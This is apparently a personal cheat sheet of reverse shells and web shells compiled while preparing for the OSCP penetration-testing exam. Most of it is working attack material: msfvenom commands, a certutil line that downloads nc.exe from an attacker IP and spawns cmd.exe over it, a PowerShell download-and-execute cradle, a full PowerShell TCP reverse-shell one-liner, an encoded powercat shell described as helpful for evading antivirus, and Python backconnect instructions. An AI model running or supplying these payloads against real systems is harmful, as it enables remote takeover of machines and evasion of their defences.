Windows and Linux shells repository

While doing OSCP i spent a lot of time looking for suitable reverse shells and web shells, i needed a repository for keeping all the shells i can use in one place.

Before we start, there is this amazing repository in pentester monkey, make sure to check it out.

http://pentestmonkey.net/tools/web-shells/perl-reverse-shell

WEB SHELLS

This GitHub project is an amazing source for web-shells, and the good thing about it that it is continuously updated.

tennc/webshell

• IIS exploits:

msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=443 -f aspx > shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=443 -f asp > shell.asp

• Using certutil.exe: (already installed in windows)

This method can be helpful if you have an RCE using a webshell and you need to have a full RCE on the machiene:

cmd=certutil.exe -urlcache -f http://192.168.49.142/nc.exe C:\Users\apache\Documents\nc.exe
cmd=C:\Users\apache\Documents\nc.exe -e cmd.exe 192.168.49.142 443

• PHP web-shell

This an amazing and very stable php reverse shell from pentestmonkey.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Windows payloads

• Meterpreter payloads

-- staged[x86] --
windows/exec
windows/meterpreter/reverse_http
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell/bind_tcp
windows/shell/reverse_tcp
-- non-staged[x86] --
windows/powershell_reverse_tcp
windows/powershell_bind_tcp
windows/meterpreter_reverse_tcp
windows/meterpreter_reverse_http
windows/meterpreter_bind_tcp
windows/shell_bind_tcp
windows/shell_reverse_tcp
-- staged[x64] --
windows/x64/exec
windows/x64/meterpreter/bind_tcp
windows/x64/meterpreter/reverse_http
windows/x64/meterpreter/reverse_tcp
windows/x64/shell/bind_tcp
windows/x64/shell/reverse_tcp
-- Non-staged[x64] --
windows/x64/meterpreter_bind_tcp
windows/x64/meterpreter_reverse_http
windows/x64/meterpreter_reverse_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp

• Powershell Paylaods

powershell -c iex(new-object net.webclient).downloadstring('http://0.0.0.0/Invoke-PowerShellTcp.ps1')

You can use the above payloads to run anything in the background on the target machine. Some exploit you can run:

Invoke-PowerShellTcp.ps1

Netcat

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('0.0.0.0',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

• Encoded shell (helpful for AV)

powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
powershell.exe <the content of encodedreverseshell.ps1>

• mkpsrevshell

This is a simple but very effective reverse shell, i used it plenty of time in windows machines.

mkpsrevshell.py script

To use the above script, you need to downoad it and then update the IP and the port number below:

python3 mkpsrevshell.py 10.10.10.10 443

The output of mkpsrevshell script

As seen above the output of the script is an encoded reverse shell ready to be used directly on the target (windows) machiene. Copy the whole output and pasete it there as shown below

running the outpot on windows target

start a nc on your kali, and when running the above script it that should give you a reverse shell

reverse shell

Linux payloads

• Meterpreter payloads

msfvenom -p linux/x86/meterpreter/reverse_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > shell.elf
[x86 Payloads]
linux/x86/meterpreter/bind_tcp
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/reverse_http
linux/x86/meterpreter_reverse_http
linux/x86/meterpreter_reverse_tcp
linux/x86/meterpreter_bind_tcp
linux/x86/shell_reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell/reverse_tcp
linux/x86/shell/bind_tcp
[x64 Payloads]
linux/x64/meterpreter/bind_tcp
linux/x64/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_http
linux/x64/meterpreter_reverse_http
linux/x64/meterpreter_reverse_tcp
linux/x64/meterpreter_bind_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell/bind_tcp

Python shells [can work for Lin only]

infodox/python-pty-shells

In the target -Linux- machiene:

Download tcp_pty_backconnect.py script in the target machiene, then edit the (host / port) then run the script:

Editing the script with kali IP and port

Then you should run the script

python tcp_pty_backconnect.py

• In the attacking machine - Kali:

Download tcp_pty_shell_handler.py script then run it using the below syntax:

Note: You need to run tcp_pty_backconnect.py in the target before starting the below handler.

python tcp_pty_shell_handler.py -b 192.168.201.37:80

Getting reverse shell

There are other scripts you can try in the above repository, such as UDP and bind reverse shell.

Finally, this repositry is not meant to be a compelte, feel free to comment out your favorite reverse shell to use, and keep looking for new and awesome $h333llss!